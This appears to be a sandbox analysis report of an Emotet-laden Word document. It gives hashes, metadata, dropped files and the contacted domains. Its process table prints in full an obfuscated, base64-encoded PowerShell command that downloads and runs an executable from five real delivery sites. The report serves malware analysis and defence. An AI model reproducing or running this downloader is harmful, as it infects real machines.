File name: | FA_UHKR3AKU52TC.doc |
Full analysis: | https://app.any.run/tasks/806a4680-2cb3-443c-847b-ca7078f84918 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 19:47:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: programming Industrial, Shoes & Health, Subject: Lakes, Author: Kylie Corwin, Comments: Avon Norwegian Krone Directives, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 22213F95806256BA5C345CA08F231903 |
SHA1: | 21DD3159F107D72F227E3F23FEBFC4C4EAA3ECFD |
SHA256: | 4745993C2538522D79EFC7406292F2E9429EFD8AB52A81F7919173D3E3E1BDCC |
SSDEEP: | 6144:VV1qmTgpbxDj2kCUSfp40sTPLkIq7NSU4jJntATfD2BlPi7+:VV1qmTgpbxDj2kCUSfp40s/Xq7NSU4VV |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | programming Industrial, Shoes & Health |
---|---|
Subject: | Lakes |
Author: | Kylie Corwin |
Keywords: | - |
Comments: | Avon Norwegian Krone Directives |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Kshlerin Group |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA_UHKR3AKU52TC.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2388 | powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8BE9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31D4F07F.wmf | wmf | |
MD5:2353260EC885C3A98A6C89D22AFF1248 | SHA256:E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5870F01.wmf | wmf | |
MD5:3A29DA903BD58B73E1F0C10CA64CA98C | SHA256:AE1164B8174C32D82293B27ED54BFFB64193EDC7C6E04DAF066A776E70727402 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_UHKR3AKU52TC.doc | pgc | |
MD5:AD07A4ECE72E0BC47901B3F8E30EFE75 | SHA256:8B03FCA649588C4A94450DFBED441BFC6C90B94E3F7D6FB9CFE2D8F1DB39F19D | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70E1CDE5.wmf | wmf | |
MD5:597872C11ED292C466AB6B41973A1DC9 | SHA256:504B99306569BEF0BAB66452F7FAA1F4C019337591DA88D20F507001DC2D8928 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1EEF290E.wmf | wmf | |
MD5:B26CB82ACEAAD19B625500BC0EB11F2D | SHA256:B97B45B771BD83756AE5E75091B31EC709DDC1FA19EE65F87BBCE88A86C1BE3F | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48409E3B.wmf | wmf | |
MD5:B419C90F42F3A4C5D5601F2F63E4E4C0 | SHA256:06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BCC884C.wmf | wmf | |
MD5:7720404BA288E079BFB0402748402071 | SHA256:84A6A1ABC3152F804B842CB283B940E47F1C1A43BAE1444987872999141FAE0E | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC5C9458.wmf | wmf | |
MD5:AD8C29ABEC4D3542383070B72BF5188E | SHA256:5938672DD2C5AAE2573FAE1FF5952BC9109E2421D91097DBDF6188196B5E6D69 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEDDB2A2.wmf | wmf | |
MD5:0B4F037A5A19E16270CB61C7FA8DD94A | SHA256:F8FD5C3D38CE93C1D02DD91F4483F5CAD5B5B406B145C8588BF5B9839E362A94 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2388 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
2388 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
2388 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
2388 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
2388 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
Domain | IP | Reputation |
---|---|---|
www.patrickglobalusa.com |
| malicious |
pipizhanzhang.com |
| unknown |
tankhoi.vn |
| unknown |
www.supercrystal.am |
| unknown |
hotel-bristol.lu |
| suspicious |